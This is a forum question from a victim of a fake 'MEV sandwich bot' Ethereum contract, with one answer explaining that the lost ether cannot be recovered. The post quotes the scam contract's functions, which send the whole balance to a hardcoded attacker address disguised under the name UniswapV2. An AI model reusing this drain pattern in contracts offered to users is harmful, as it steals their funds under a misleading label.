# Anyway to recover lost ether sent to unowned wallet?

Tags: contract-development, blockchain, ethereumjs, smart-contract-wallets

I was sent a smart contract by a "friend" described as an MEV sandwich bot. But when I started up the bot and finally took a hard look at the code, I realized that all of the ether was transferred from the contract address to a wallet that I do not own. Is there any way to revert the transaction or somehow withdrawal that ether that was sent to that wallet that is not owned by myself? This is very troubling to me since I do not have a lot of money and I am a college student. Is there a way I can make another smart contract that can withdrawal the funds from that external wallet without needing an approval on their side? The wallet where the funds were transferred is as follows:

address UniswapV2 = 0xD27D3fBbD272ae4348c4293413539Cd3D70d872d;

and the contract had malicious code that I did not see until afterwards as follows:

```
function start() public payable { 
    payable((UniswapV2)).transfer(address(this).balance);
}

function withdrawal() public payable { 
    payable((UniswapV2)).transfer(address(this).balance);
}
```

Answer (score 0):

Unfortunately there is no way you can retrieve the funds unless you detain the private key of this address or that if you know the owner of the address. Since your "friend" explicitly setup the receiving address, it is fair to assume that he has control over this address and has no intent of redeeming the ETH back.

Next time refrain from interacting (or deploying) any smart contract that you do not know what it does.